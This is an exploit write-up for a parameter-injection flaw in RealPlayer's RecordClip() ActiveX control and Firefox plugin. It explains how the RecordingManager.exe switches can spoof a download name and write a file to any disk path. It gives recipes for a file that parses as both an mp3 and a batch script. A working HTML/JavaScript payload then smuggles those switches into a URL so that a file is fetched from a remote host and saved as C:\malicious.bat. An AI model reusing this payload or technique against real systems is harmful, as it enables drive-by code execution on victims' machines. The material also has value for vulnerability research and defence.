Sources:  http://www.securityfocus.com/bid/44443/info
          http://packetstormsecurity.org/files/view/97522/recordingmanager-ie.txt
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Written by Sean de Regge (seanderegge hotmail.com)

Exploit for the parameter injection bug in Realplayers RecordClip() activeX function and firefox plugin
http://www.zerodayinitiative.com/advisories/ZDI-10-211/

C:\Program Files\Real\RealPlayer\RecordingManager.exe has 2 interesting switches:
/t will spoof the download of any file so you can make it look like it's downloading a normal mp3 file
/f will make it download to any location on the disk instead of the realplayer downloads folder

Restrictions:
The extension on server side must be a valid media file (ie: .mp3)
Realplayer does some checks on the file to see if it is a valid media file too, so we need to create a 
chimera file, which will parse as a valid mp3 file and a valid batch file.
Best is to take a valid mp3 file and modify it in a hex editor to have your batch commands in the first couple of bytes.
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<OBJECT ID="obj" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5">
</OBJECT>
<embed type="audio/x-pn-realaudio-plugin"


    controls="ImageWindow"
    console="video1"
    src='http://xx.xx.xx.xx/batch_file_in_mp3.mp3" /f C:\\malicious.bat /t cool_song.mp3'
    width="240"
    height="180"
    autostart=true>

 </embed> 
<script>


var file = 'http://xx.xx.xx.xx/batch_file_in_mp3.mp3" /f C:\\malicious.bat /t cool_song.mp3';

obj.RecordClip(file, "audio/mpeg3", "clipInfo");
	

</script>
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